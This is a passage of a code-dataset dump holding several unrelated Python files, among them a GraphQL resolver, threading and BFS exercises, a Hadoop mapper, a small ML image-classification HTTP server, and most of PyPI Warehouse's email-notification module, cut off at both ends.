BlogPayload\n) -> Blog:\n return update_blog(int(id), payload)\n\n#attach blog query to author using resolve\n@blog_query.field(\"author\")\ndef resolve_blog_author(blog: dict[str, Any], info: GraphQLResolveInfo) -> Author:\n print(blog)\n return get_author(blog[\"author_id\"])\n","repo_name":"shlbatra/PythonTips","sub_path":"27-GraphQLvsRest/2022-rest-graphql-main/graphql/schema/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"18403409614","text":"import threading\n\nthread_local_std = threading.local()\n\n\ndef HomeWork(std):\n thread_local_std.std = std\n MathWork()\n ChineseWork()\n\n\ndef HouseWork(std):\n thread_local_std.std = std\n Sweep()\n Clean()\n\n\ndef MathWork():\n std = thread_local_std.std\n print('%s do mathWork in %s' % (std, threading.current_thread().name))\n\n\ndef ChineseWork():\n std = thread_local_std.std\n print('%s do ChineseWork in %s' % (std, threading.current_thread().name))\n\n\ndef Sweep():\n std = thread_local_std.std\n print('%s do Sweep in %s' % (std, threading.current_thread().name))\n\n\ndef Clean():\n std = thread_local_std.std\n print('%s do Clean in %s' % (std, threading.current_thread().name))\n\n\ndef main():\n print('Main Thread: %s start' % threading.current_thread().name)\n HomeWork_Thread = threading.Thread(\n target=HomeWork, args=('Mike', ), name='MikeHomeWork')\n HouseWork_Thread = threading.Thread(\n target=HouseWork, args=('Sam', ), name='SamHouseWork')\n HomeWork_Thread.start()\n HouseWork_Thread.start()\n HomeWork_Thread.join()\n HouseWork_Thread.join()\n print('Main Thread: %s end' % threading.current_thread().name)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"lwh2016/0_PYTHON","sub_path":"1-BasicKnowledge/9-多线程/ThreadLocal.py","file_name":"ThreadLocal.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35143454461","text":"import re\nimport sys\nfrom operator import itemgetter\n\nnested_dict = {}\n\nfor line in sys.stdin:\n line = line.strip()\n ip, count = line.split('\\t')\n # print(ip, count)\n index = ip.find(']')\n hour, ipaddress = ip[1:index], ip[index + 1:]\n # print(\"hour\",hour)\n # print(\"ipaddess\",ipaddress)\n\n if hour not in nested_dict.keys():\n nested_dict[hour] = {}\n nested_dict[hour][ipaddress] = int(count)\n else:\n if ipaddress not in nested_dict[hour].keys():\n nested_dict[hour][ipaddress] = int(count)\n # print(nested_dict)\n\n# nested_dict = sorted(nested_dict.items(), key= lambda x : x[1], reverse=True)\n# inal_dict = {}\nfor hour, inner_dict in nested_dict.items():\n # print(hour)\n inner_dict = sorted(inner_dict.items(), key=itemgetter(1), reverse=True)\n # final_dict[hour] = {}\n top3 = 0\n for ip, count in inner_dict:\n if top3 >= 3:\n break\n print(hour + \"\\t\" + ip + \"\\t\" + str(count))\n # final_dict[hour][ip] = count\n top3 += 1","repo_name":"aditigode/Hadoop-searchIPaddresses","sub_path":"part1/mapper_chain2.py","file_name":"mapper_chain2.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35445926290","text":"import numpy as np\n\n# object is the base class\nclass Regressor(object):\n \"\"\"\n Base class for regressors\n \"\"\"\n\n def fit(self, X, t, **kwargs):\n \"\"\"\n estimates parameters given training dateset\n\n Parameters\n ----------\n X: (sample_size, n_fatures) np.ndarray\n training data input\n \n t: (sample_size, ) np.ndarray\n training data target\n \"\"\"\n self.__check_input(X)\n self.__check_target(t)\n if hasattr(self, \"__fit\"):\n self.__fit(X, t, **kwargs)\n else:\n raise NotImplementedError\n\n def __check_input(self, X):\n if not isinstance(X, np.ndarray):\n raise TypeError(\"X(input) is not a np.ndarray\")\n if X.ndim != 2:\n raise ValueError(\"X(input) is not two dimentional array\")\n # The hasattr() method returns true if an object has the given named attribute \n # and false if it does not.\n if hasattr(self, \"n_features\") and self.n_features != np.size(X, 1):\n raise ValueError(\n \"mismatch in dimension 1 of X(input) \"\n \"(size {} is different from {})\"\n .format(np.size(X, axis = 1), self.n_features))\n \n def __check_target(self, t):\n if not isinstance(t, np.ndarray):\n raise TypeError(\"t(target) must be np.ndarray\")\n if t.ndim != 1:\n raise ValueError(\"t(target) mst be one dimensional array\")\n\n","repo_name":"yiruijiang/PRML","sub_path":"linear/regressor.py","file_name":"regressor.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36377064248","text":"#백준 7569번\nimport sys\nfrom collections import deque\n\nm, n, h = map(int, input().split())\n\nmatrix = [[list(map(int, sys.stdin.readline().split())) for _ in range(n)] for _ in range(h)]\nvisited = [[[False]*m for _ in range(n)] for _ in range(h)]\n\nqueue = deque()\n\ndx = [-1,1,0,0,0,0]\ndy = [0,0,-1,1,0,0]\ndz = [0,0,0,0,-1,1]\n\ndef bfs():\n while queue:\n x,y,z = queue.popleft()\n\n for i in range(6):\n nx = x + dx[i]\n ny = y + dy[i]\n nz = z + dz[i]\n\n if nx < 0 or ny < 0 or nz < 0 or nx >= m or ny >= n or nz >= h:\n continue\n if matrix[nz][ny][nx] == 0 and visited[nz][ny][nx] == False:\n queue.append((nx,ny,nz))\n matrix[nz][ny][nx] = matrix[z][y][x] + 1\n visited[nz][ny][nx] = True\n\nanswer = 0\nfor a in range(h):\n for b in range(n):\n for c in range(m):\n if matrix[a][b][c] == 1 and visited[a][b][c] == False:\n queue.append((c,b,a))\n visited[a][b][c] = True\nbfs()\n\n# 토마토 확인\nfor a in matrix:\n for b in a:\n for c in b:\n if c == 0:\n print(-1)\n exit(0)\n answer = max(answer, max(b))\n\nprint(answer-1)","repo_name":"LeeYongIn0517/CodingTest","sub_path":"dfs:bfs/토마토.py","file_name":"토마토.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72189752403","text":"# Given an array, find the average of all contiguous subarrays of size ‘K’ in it.\n\n# Array: [1, 3, 2, 6, -1, 4, 1, 8, 2], K=5\n\n# Naive solution using two for loop one from 0 to k-1 and inner for loop from sliding i, i + k\n# complexity O(N*K) N elements in array and k is size of subarray\n\n\ndef solution(arr, k):\n\n windowSum = 0.0\n windowStart = 0\n result = []\n for index, ele in enumerate(arr):\n windowSum += ele\n\n if index >= k -1:\n result.append((windowSum/k))\n windowSum -= arr[windowStart]\n windowStart +=1\n \n return result\n\n\narr = [1, 3, 2, 6, -1, 4, 1, 8, 2]\nk = 5\n\nprint(\"Solution:\", solution(arr, k ))\n","repo_name":"sswapnil2/data-structures-algorithms","sub_path":"binarytree/educative/sliding_window/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34570441494","text":"from http.server import BaseHTTPRequestHandler, HTTPServer\nhost_name = \"localhost\"\nhost_port = 8080\n\nfrom ml import hello\n\nalgoFileName1 = 'linear'\nalgoFileName2 = 'conv'\nalgoFileName3 = 'perceptron'\nalgoFileName4 = 'none'\n\ndef getModelName(input):\n result = algoFileName1\n if input == '' :\n result = algoFileName1\n elif input == '1' :\n result = algoFileName1\n elif input == '2' :\n result = algoFileName2\n elif input == '3' :\n result = algoFileName3\n else :\n result = algoFileName4\n return result\n\nclass MyServer(BaseHTTPRequestHandler):\n def do_HEAD(self):\n self.send_response(200)\n self.send_header('Content-type', 'plain/text')\n self.send_header(\"Access-Control-Allow-Origin\", \"*\")\n self.end_headers()\n\n def do_POST(self):\n content_length = int(self.headers['Content-Length'])\n image = self.rfile.read(content_length)\n algoFile = getModelName(self.path[1:])\n\n result = hello(image, algoFile)\n\n self.do_HEAD()\n self.wfile.write(result.encode('utf-8'))\n\n def do_GET(self):\n self.do_HEAD()\n self.wfile.write('OK'.encode('utf-8'))\n\nif __name__ == '__main__':\n http_server = HTTPServer((host_name, host_port), MyServer)\n print(\"Running server on %s:%s\" % (host_name, host_port))\n http_server.serve_forever()","repo_name":"Effobless2/MachineLearningESGI4AL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8374586658","text":"import _plotly_utils.basevalidators\n\n\nclass BarValidator(_plotly_utils.basevalidators.CompoundValidator):\n def __init__(self, plotly_name=\"bar\", parent_name=\"indicator.gauge\", **kwargs):\n super(BarValidator, self).__init__(\n plotly_name=plotly_name,\n parent_name=parent_name,\n data_class_str=kwargs.pop(\"data_class_str\", \"Bar\"),\n data_docs=kwargs.pop(\n \"data_docs\",\n \"\"\"\n color\n Sets the background color of the arc.\n line\n :class:`plotly.graph_objects.indicator.gauge.ba\n r.Line` instance or dict with compatible\n properties\n thickness\n Sets the thickness of the bar as a fraction of\n the total thickness of the gauge.\n\"\"\",\n ),\n **kwargs,\n )\n","repo_name":"plotly/plotly.py","sub_path":"packages/python/plotly/plotly/validators/indicator/gauge/_bar.py","file_name":"_bar.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":14438,"dataset":"github-code","pt":"3"} +{"seq_id":"43024019354","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport datetime\nimport functools\n\nfrom email.headerregistry import Address\n\nimport pytz\nimport sentry_sdk\n\nfrom celery.schedules import crontab\nfrom first import first\nfrom pyramid_mailer.exceptions import BadHeaders, EncodingError, InvalidMessage\nfrom sqlalchemy.exc import NoResultFound\n\nfrom warehouse import tasks\nfrom warehouse.accounts.interfaces import ITokenService, IUserService\nfrom warehouse.accounts.models import Email\nfrom warehouse.email.interfaces import IEmailSender\nfrom warehouse.email.services import EmailMessage\nfrom warehouse.email.ses.tasks import cleanup as ses_cleanup\nfrom warehouse.events.tags import EventTag\nfrom warehouse.metrics.interfaces import IMetricsService\n\n\ndef _compute_recipient(user, email):\n # We want to try and use the user's name, then their username, and finally\n # nothing to display a \"Friendly\" name for the recipient.\n return str(Address(first([user.name, user.username], default=\"\"), addr_spec=email))\n\n\ndef _redact_ip(request, email):\n # We should only store/display IP address of an 'email sent' event if the user\n # who triggered the email event is the one who receives the email. Else display\n # 'Redacted' to prevent user privacy concerns. If we don't know the user who\n # triggered the action, default to showing the IP of the source.\n\n try:\n user_email = request.db.query(Email).filter(Email.email == email).one()\n except NoResultFound:\n # The email might have been deleted if this is an account deletion event\n return False\n\n if request._unauthenticated_userid:\n return user_email.user_id != request._unauthenticated_userid\n if request.user:\n return user_email.user_id != request.user.id\n if request.remote_addr == \"127.0.0.1\":\n # This is the IP used when synthesizing a request in a task\n return True\n return False\n\n\n@tasks.task(bind=True, ignore_result=True, acks_late=True)\ndef send_email(task, request, recipient, msg, success_event):\n msg = EmailMessage(**msg)\n sender = request.find_service(IEmailSender)\n\n try:\n sender.send(recipient, msg)\n user_service = request.find_service(IUserService, context=None)\n user = user_service.get_user(success_event.pop(\"user_id\"))\n success_event[\"request\"] = request\n if user is not None: # We send account deletion confirmation emails\n user.record_event(**success_event)\n except (BadHeaders, EncodingError, InvalidMessage) as exc:\n raise exc\n except Exception as exc:\n # Send any other exception to Sentry, but don't re-raise it\n sentry_sdk.capture_exception(exc)\n task.retry(exc=exc)\n\n\ndef _send_email_to_user(\n request,\n user,\n msg,\n *,\n email=None,\n allow_unverified=False,\n repeat_window=None,\n):\n # If we were not given a specific email object, then we'll default to using\n # the User's primary email address.\n if email is None:\n email = user.primary_email\n\n # If we were not able to locate an email address for this user, then we will just\n # have to skip sending email to them. If we have an email for them, then we will\n # check to see if it is verified, if it is not then we will also skip sending email\n # to them **UNLESS** we've been told to allow unverified emails.\n if email is None or not (email.verified or allow_unverified):\n return\n\n # If we've already sent this email within the repeat_window, don't send it.\n if repeat_window is not None:\n sender = request.find_service(IEmailSender)\n last_sent = sender.last_sent(to=email.email, subject=msg.subject)\n if last_sent and (datetime.datetime.now() - last_sent) <= repeat_window:\n return\n\n request.task(send_email).delay(\n _compute_recipient(user, email.email),\n {\n \"subject\": msg.subject,\n \"body_text\": msg.body_text,\n \"body_html\": msg.body_html,\n },\n {\n \"tag\": EventTag.Account.EmailSent,\n \"user_id\": user.id,\n \"additional\": {\n \"from_\": request.registry.settings.get(\"mail.sender\"),\n \"to\": email.email,\n \"subject\": msg.subject,\n \"redact_ip\": _redact_ip(request, email.email),\n },\n },\n )\n\n\ndef _email(\n name,\n *,\n allow_unverified=False,\n repeat_window=None,\n):\n \"\"\"\n This decorator is used to turn an e function into an email sending function!\n\n The name parameter is the name of the email we're going to be sending (used to\n locate the templates on the file system).\n\n The allow_unverified kwarg flags whether we will send this email to an unverified\n email or not. We generally do not want to do this, but some emails are important\n enough or have special requirements that require it.\n\n Functions that are decorated by this need to accept two positional arguments, the\n first argument is the Pyramid request object, and the second argument is either\n a single User, or a list of Users. These users represent the recipients of this\n email. Additional keyword arguments are supported, but are not otherwise restricted.\n\n Functions decorated by this must return a mapping of context variables that will\n ultimately be returned, but which will also be used to render the templates for\n the emails.\n\n Thus this function can decorate functions with a signature like so:\n\n def foo(\n request: Request, user_or_users: Union[User, List[User]]\n ) -> Mapping[str, Any]:\n ...\n\n Finally, if the email needs to be sent to an address *other* than the user's primary\n email address, instead of a User object, a tuple of (User, Email) objects may be\n used in place of a User object.\n \"\"\"\n\n def inner(fn):\n @functools.wraps(fn)\n def wrapper(request, user_or_users, **kwargs):\n if isinstance(user_or_users, (list, set)):\n recipients = user_or_users\n else:\n recipients = [user_or_users]\n\n context = fn(request, user_or_users, **kwargs)\n msg = EmailMessage.from_template(name, context, request=request)\n\n for recipient in recipients:\n if isinstance(recipient, tuple):\n user, email = recipient\n else:\n user, email = recipient, None\n\n _send_email_to_user(\n request,\n user,\n msg,\n email=email,\n allow_unverified=allow_unverified,\n repeat_window=repeat_window,\n )\n metrics = request.find_service(IMetricsService, context=None)\n metrics.increment(\n \"warehouse.emails.scheduled\",\n tags=[\n f\"template_name:{name}\",\n f\"allow_unverified:{allow_unverified}\",\n f\"repeat_window:{repeat_window.total_seconds()}\"\n if repeat_window\n else \"repeat_window:none\",\n ],\n )\n\n return context\n\n return wrapper\n\n return inner\n\n\n# Email templates for administrators.\n\n\n@_email(\"admin-new-organization-requested\")\ndef send_admin_new_organization_requested_email(\n request, user, *, organization_name, initiator_username, organization_id\n):\n return {\n \"initiator_username\": initiator_username,\n \"organization_id\": organization_id,\n \"organization_name\": organization_name,\n }\n\n\n@_email(\"admin-new-organization-approved\")\ndef send_admin_new_organization_approved_email(\n request, user, *, organization_name, initiator_username, message=\"\"\n):\n return {\n \"initiator_username\": initiator_username,\n \"message\": message,\n \"organization_name\": organization_name,\n }\n\n\n@_email(\"admin-new-organization-declined\")\ndef send_admin_new_organization_declined_email(\n request, user, *, organization_name, initiator_username, message=\"\"\n):\n return {\n \"initiator_username\": initiator_username,\n \"message\": message,\n \"organization_name\": organization_name,\n }\n\n\n@_email(\"admin-organization-renamed\")\ndef send_admin_organization_renamed_email(\n request, user, *, organization_name, previous_organization_name\n):\n return {\n \"organization_name\": organization_name,\n \"previous_organization_name\": previous_organization_name,\n }\n\n\n@_email(\"admin-organization-deleted\")\ndef send_admin_organization_deleted_email(request, user, *, organization_name):\n return {\n \"organization_name\": organization_name,\n }\n\n\n# Email templates for users.\n\n\n@_email(\"password-reset\", allow_unverified=True)\ndef send_password_reset_email(request, user_and_email):\n user, _ = user_and_email\n token_service = request.find_service(ITokenService, name=\"password\")\n token = token_service.dumps(\n {\n \"action\": \"password-reset\",\n \"user.id\": str(user.id),\n \"user.last_login\": str(\n user.last_login or datetime.datetime.min.replace(tzinfo=pytz.UTC)\n ),\n \"user.password_date\": str(\n user.password_date or datetime.datetime.min.replace(tzinfo=pytz.UTC)\n ),\n }\n )\n\n return {\n \"token\": token,\n \"username\": user.username,\n \"n_hours\": token_service.max_age // 60 // 60,\n }\n\n\n@_email(\"verify-email\", allow_unverified=True)\ndef send_email_verification_email(request, user_and_email):\n user, email = user_and_email\n token_service = request.find_service(ITokenService, name=\"email\")\n token = token_service.dumps({\"action\": \"email-verify\", \"email.id\": email.id})\n\n return {\n \"token\": token,\n \"email_address\": email.email,\n \"n_hours\": token_service.max_age // 60 // 60,\n }\n\n\n@_email(\"new-email-added\")\ndef send_new_email_added_email(request, user_and_email, *, new_email_address):\n user, _ = user_and_email\n\n return {\n \"username\": user.username,\n \"new_email_address\": new_email_address,\n }\n\n\n@_email(\"password-change\")\ndef send_password_change_email(request, user):\n return {\"username\": user.username}\n\n\n@_email(\"password-compromised\", allow_unverified=True)\ndef send_password_compromised_email(request, user):\n return {}\n\n\n@_email(\"password-compromised-hibp\", allow_unverified=True)\ndef send_password_compromised_email_hibp(request, user):\n return {}\n\n\n@_email(\"token-compromised-leak\", allow_unverified=True)\ndef send_token_compromised_email_leak(request, user, *, public_url, origin):\n return {\"username\": user.username, \"public_url\": public_url, \"origin\": origin}\n\n\n@_email(\n \"basic-auth-with-2fa\",\n allow_unverified=True,\n repeat_window=datetime.timedelta(days=1),\n)\ndef send_basic_auth_with_two_factor_email(request, user, *, project_name):\n return {\"project_name\": project_name}\n\n\n@_email(\n \"two-factor-not-yet-enabled\",\n allow_unverified=True,\n repeat_window=datetime.timedelta(days=14),\n)\ndef send_two_factor_not_yet_enabled_email(request, user):\n return {\"username\": user.username}\n\n\n@_email(\"gpg-signature-uploaded\", repeat_window=datetime.timedelta(days=1))\ndef send_gpg_signature_uploaded_email(request, user, *, project_name):\n return {\"project_name\": project_name}\n\n\n@_email(\"account-deleted\")\ndef send_account_deletion_email(request, user):\n return {\"username\": user.username}\n\n\n@_email(\"primary-email-change\")\ndef send_primary_email_change_email(request, user_and_email):\n user, email = user_and_email\n return {\n \"username\": user.username,\n \"old_email\": email.email,\n \"new_email\": user.email,\n }\n\n\n@_email(\"new-organization-requested\")\ndef send_new_organization_requested_email(request, user, *, organization_name):\n return {\"organization_name\": organization_name}\n\n\n@_email(\"new-organization-approved\")\ndef send_new_organization_approved_email(\n request, user, *, organization_name, message=\"\"\n):\n return {\n \"message\": message,\n \"organization_name\": organization_name,\n }\n\n\n@_email(\"new-organization-declined\")\ndef send_new_organization_declined_email(\n request, user, *, organization_name, message=\"\"\n):\n return {\n \"message\": message,\n \"organization_name\": organization_name,\n }\n\n\n@_email(\"organization-project-added\")\ndef send_organization_project_added_email(\n request, user, *, organization_name, project_name\n):\n return {\n \"organization_name\": organization_name,\n \"project_name\": project_name,\n }\n\n\n@_email(\"organization-project-removed\")\ndef send_organization_project_removed_email(\n request, user, *, organization_name, project_name\n):\n return {\n \"organization_name\": organization_name,\n \"project_name\": project_name,\n }\n\n\n@_email(\"organization-member-invited\")\ndef send_organization_member_invited_email(\n request,\n email_recipients,\n *,\n user,\n desired_role,\n initiator_username,\n organization_name,\n email_token,\n token_age,\n):\n return {\n \"username\": user.username,\n \"desired_role\": desired_role,\n \"initiator_username\": initiator_username,\n \"n_hours\": token_age // 60 // 60,\n \"organization_name\": organization_name,\n \"token\": email_token,\n }\n\n\n@_email(\"verify-organization-role\", allow_unverified=True)\ndef send_organization_role_verification_email(\n request,\n user,\n *,\n desired_role,\n initiator_username,\n organization_name,\n email_token,\n token_age,\n):\n return {\n \"username\": user.username,\n \"desired_role\": desired_role,\n \"initiator_username\": initiator_username,\n \"n_hours\": token_age // 60 // 60,\n \"organization_name\": organization_name,\n \"token\": email_token,\n }\n\n\n@_email(\"organization-member-invite-canceled\")\ndef send_organization_member_invite_canceled_email(\n request,\n email_recipients,\n *,\n user,\n organization_name,\n):\n return {\n \"username\": user.username,\n \"organization_name\": organization_name,\n }\n\n\n@_email(\"canceled-as-invited-organization-member\")\ndef send_canceled_as_invited_organization_member_email(\n request,\n user,\n *,\n organization_name,\n):\n return {\n \"username\": user.username,\n \"organization_name\": organization_name,\n }\n\n\n@_email(\"organization-member-invite-declined\")\ndef send_organization_member_invite_declined_email(\n request,\n email_recipients,\n *,\n user,\n organization_name,\n message,\n):\n return {\n \"username\": user.username,\n \"organization_name\": organization_name,\n \"message\": message,\n }\n\n\n@_email(\"declined-as-invited-organization-member\")\ndef send_declined_as_invited_organization_member_email(\n request,\n user,\n *,\n organization_name,\n):\n return {\n \"username\": user.username,\n \"organization_name\": organization_name,\n }\n\n\n@_email(\"organization-member-added\")\ndef send_organization_member_added_email(\n request,\n email_recipients,\n *,\n user,\n submitter,\n organization_name,\n role,\n):\n return {\n \"username\": user.username,\n \"submitter\": submitter.username,\n \"organization_name\": organization_name,\n \"role\": role,\n }\n\n\n@_email(\"added-as-organization-member\")\ndef send_added_as_organization_member_email(\n request,\n user,\n *,\n submitter,\n organization_name,\n role,\n):\n return {\n \"username\": user.username,\n \"submitter\": submitter.username,\n \"organization_name\": organization_name,\n \"role\": role,\n }\n\n\n@_email(\"organization-member-removed\")\ndef send_organization_member_removed_email(\n request,\n email_recipients,\n *,\n user,\n submitter,\n organization_name,\n):\n return {\n \"username\": user.username,\n \"submitter\": submitter.username,\n \"organization_name\": organization_name,\n }\n\n\n@_email(\"removed-as-organization-member\")\ndef send_removed_as_organization_member_email(\n request,\n user,\n *,\n submitter,\n organization_name,\n):\n return {\n \"username\": user.username,\n \"submitter\": submitter.username,\n \"organization_name\": organization_name,\n }\n\n\n@_email(\"organization-member-role-changed\")\ndef send_organization_member_role_changed_email(\n request,\n email_recipients,\n *,\n user,\n submitter,\n organization_name,\n role,\n):\n return {\n \"username\": user.username,\n \"submitter\": submitter.username,\n \"organization_name\": organization_name,\n \"role\": role,\n }\n\n\n@_email(\"role-changed-as-organization-member\")\ndef send_role_changed_as_organization_member_email(\n request,\n user,\n *,\n submitter,\n organization_name,\n role,\n):\n return {\n \"username\": user.username,\n \"organization_name\": organization_name,\n \"submitter\": submitter.username,\n \"role\": role,\n }\n\n\n@_email(\"organization-updated\")\ndef send_organization_updated_email(\n request,\n user,\n *,\n organization_name,\n organization_display_name,\n organization_link_url,\n organization_description,\n organization_orgtype,\n previous_organization_display_name,\n previous_organization_link_url,\n previous_organization_description,\n previous_organization_orgtype,\n):\n return {\n \"organization_name\": organization_name,\n \"organization_display_name\": organization_display_name,\n \"organization_link_url\": organization_link_url,\n \"organization_description\": organization_description,\n \"organization_orgtype\": organization_orgtype,\n \"previous_organization_display_name\": previous_organization_display_name,\n \"previous_organization_link_url\": previous_organization_link_url,\n \"previous_organization_description\": previous_organization_description,\n \"previous_organization_orgtype\": previous_organization_orgtype,\n }\n\n\n@_email(\"organization-renamed\")\ndef send_organization_renamed_email(\n request, user, *, organization_name, previous_organization_name\n):\n return {\n \"organization_name\": organization_name,\n \"previous_organization_name\": previous_organization_name,\n }\n\n\n@_email(\"organization-deleted\")\ndef send_organization_deleted_email(request, user, *, organization_name):\n return {\n \"organization_name\": organization_name,\n }\n\n\n@_email(\"team-created\")\ndef send_team_created_email(request, user, *, organization_name, team_name):\n return {\n \"organization_name\": organization_name,\n \"team_name\": team_name,\n }\n\n\n@_email(\"team-deleted\")\ndef send_team_deleted_email(request, user, *, organization_name, team_name):\n return {\n \"organization_name\": organization_name,\n \"team_name\": team_name,\n }\n\n\n@_email(\"team-member-added\")\ndef send_team_member_added_email(\n request,\n email_recipients,\n *,\n user,\n submitter,\n organization_name,\n team_name,\n):\n return {\n \"username\": user.username,\n \"submitter\": submitter.username,\n \"organization_name\": organization_name,\n \"team_name\": team_name,\n }\n\n\n@_email(\"added-as-team-member\")\ndef send_added_as_team_member_email(\n request,\n user,\n *,\n submitter,\n organization_name,\n team_name,\n):\n return {\n \"username\": user.username,\n \"submitter\": submitter.username,\n \"organization_name\": organization_name,\n \"team_name\": team_name,\n }\n\n\n@_email(\"team-member-removed\")\ndef send_team_member_removed_email(\n request,\n email_recipients,\n *,\n user,\n submitter,\n organization_name,\n team_name,\n):\n return {\n \"username\": user.username,\n \"submitter\": submitter.username,\n \"organization_name\": organization_name,\n \"team_name\": team_name,\n }\n\n\n@_email(\"removed-as-team-member\")\ndef send_removed_as_team_member_email(\n request,\n user,\n *,\n submitter,\n organization_name,\n team_name,\n):\n return {\n \"username\": user.username,\n \"submitter\": submitter.username,\n \"organization_name\": organization_name,\n \"team_name\": team_name,\n }\n\n\n@_email(\"verify-project-role\", allow_unverified=True)\ndef send_project_role_verification_email(\n request,\n user,\n desired_role,\n initiator_username,\n project_name,\n email_token,\n token_age,\n):\n return {\n \"desired_role\": desired_role,\n \"email_address\": user.email,\n \"initiator_username\": initiator_username,\n \"n_hours\": token_age // 60 // 60,\n \"project_name\": project_name,\n \"token\": email_token,\n }\n\n\n@_email(\"collaborator-added\")\ndef send_collaborator_added_email(\n request, email_recipients, *, user, submitter, project_name, role\n):\n return {\n \"username\": user.username,\n \"project\": project_name,\n \"submitter\": submitter.username,\n \"role\": role,\n }\n\n\n@_email(\"added-as-collaborator\")\ndef send_added_as_collaborator_email(request, user, *, submitter, project_name, role):\n return {\n \"project_name\": project_name,\n \"initiator_username\": submitter.username,\n \"role\": role,\n }\n\n\n@_email(\"collaborator-removed\")\ndef send_collaborator_removed_email(\n request, email_recipients, *, user, submitter, project_name\n):\n return {\n \"username\": user.username,\n \"project\": project_name,\n \"submitter\": submitter.username,\n }\n\n\n@_email(\"removed-as-collaborator\")\ndef send_removed_as_collaborator_email(request, user, *, submitter, project_name):\n return {\n \"project\": project_name,\n \"submitter\": submitter.username,\n }\n\n\n@_email(\"collaborator-role-changed\")\ndef send_collaborator_role_changed_email(\n request, recipients, *, user, submitter, project_name, role\n):\n return {\n \"username\": user.username,\n \"project\": project_name,\n \"submitter\": submitter.username,\n \"role\": role,\n }\n\n\n@_email(\"role-changed-as-collaborator\")\ndef send_role_changed_as_collaborator_email(\n request, user, *, submitter, project_name, role\n):\n return {\n \"project\": project_name,\n \"submitter\": submitter.username,\n \"role\": role,\n }\n\n\n@_email(\"team-collaborator-added\")\ndef send_team_collaborator_added_email(\n request, email_recipients, *, team, submitter, project_name, role\n):\n return {\n \"team_name\": team.name,\n \"project\": project_name,\n \"submitter\": submitter.username,\n \"role\": role,\n }\n\n\n@_email(\"added-as-team-collaborator\")\ndef send_added_as_team_collaborator_email(\n request, email_recipients, *, team, submitter, project_name, role\n):\n return {\n \"team_name\": team.name,\n \"project\": project_name,\n \"submitter\": submitter.username,\n \"role\": role,\n }\n\n\n@_email(\"team-collaborator-removed\")\ndef send_team_collaborator_removed_email(\n request, email_recipients, *, team, submitter, project_name\n):\n return {\n \"team_name\": team.name,\n \"project\": project_name,\n \"submitter\": submitter.username,\n }\n\n\n@_email(\"removed-as-team-collaborator\")\ndef send_removed_as_team_collaborator_email(\n request, email_recipients, *, team, submitter, project_name\n):\n return {\n \"team_name\": team.name,\n \"project\": project_name,\n \"submitter\": submitter.username,\n }\n\n\n@_email(\"team-collaborator-role-changed\")\ndef send_team_collaborator_role_changed_email(\n request, email_recipients, *, team, submitter, project_name, role\n):\n return {\n \"team_name\": team.name,\n \"project\": project_name,\n \"submitter\": submitter.username,\n \"role\": role,\n }\n\n\n@_email(\"role-changed-as-team-collaborator\")\ndef send_role_changed_as_team_collaborator_email(\n request, email_recipients, *, team, submitter, project_name, role\n):\n return {\n \"team_name\": team.name,\n \"project\": project_name,\n \"submitter\": submitter.username,\n \"role\": role,\n }\n\n\n@_email(\"two-factor-added\")\ndef send_two_factor_added_email(request, user, method):\n pretty_methods = {\"totp\": \"TOTP\", \"webauthn\": \"WebAuthn\"}\n return {\"method\": pretty_methods[method], \"username\": user.username}\n\n\n@_email(\"two-factor-removed\")\ndef send_two_factor_removed_email(request, user, method):\n pretty_methods = {\"totp\": \"TOTP\", \"webauthn\": \"WebAuthn\"}\n return {\"method\": pretty_methods[method], \"username\": user.username}\n\n\n@_email(\"removed-project\")\ndef send_removed_project_email(\n request, user, *, project_name, submitter_name, submitter_role, recipient_role\n):\n recipient_role_descr = \"an owner\"\n if recipient_role == \"Maintainer\":\n recipient_role_descr = \"a maintainer\"\n\n return {\n \"project_name\": project_name,\n \"submitter_name\": submitter_name,\n \"submitter_role\": submitter_role.lower(),\n \"recipient_role_descr\": recipient_role_descr,\n }\n\n\n@_email(\"yanked-project-release\")\ndef send_yanked_project_release_email(\n request, user, *, release, submitter_name, submitter_role, recipient_role\n):\n recipient_role_descr = \"an owner\"\n if recipient_role == \"Maintainer\":\n recipient_role_descr = \"a maintainer\"\n\n return {\n \"project\": release.project.name,\n \"release\": release.version,\n \"release_date\": release.created.strftime(\"%Y-%m-%d\"),\n \"submitter\": submitter_name,\n \"submitter_role\": submitter_role.lower(),\n \"recipient_role_descr\": recipient_role_descr,\n \"yanked_reason\": release.yanked_reason,\n }\n\n\n@_email(\"unyanked-project-release\")\ndef send_unyanked_project_release_email(\n request, user, *, release, submitter_name, submitter_role, recipient_role\n):\n recipient_role_descr = \"an owner\"\n if recipient_role == \"Maintainer\":\n recipient_role_descr = \"a maintainer\"\n\n return {\n \"project\": release.project.name,\n \"release\": release.version,\n \"release_date\": release.created.strftime(\"%Y-%m-%d\"),\n \"submitter\": submitter_name,\n \"submitter_role\": submitter_role.lower(),\n \"recipient_role_descr\": recipient_role_descr,\n }\n\n\n@_email(\"removed-project-release\")\ndef send_removed_project_release_email(\n request, user, *, release, 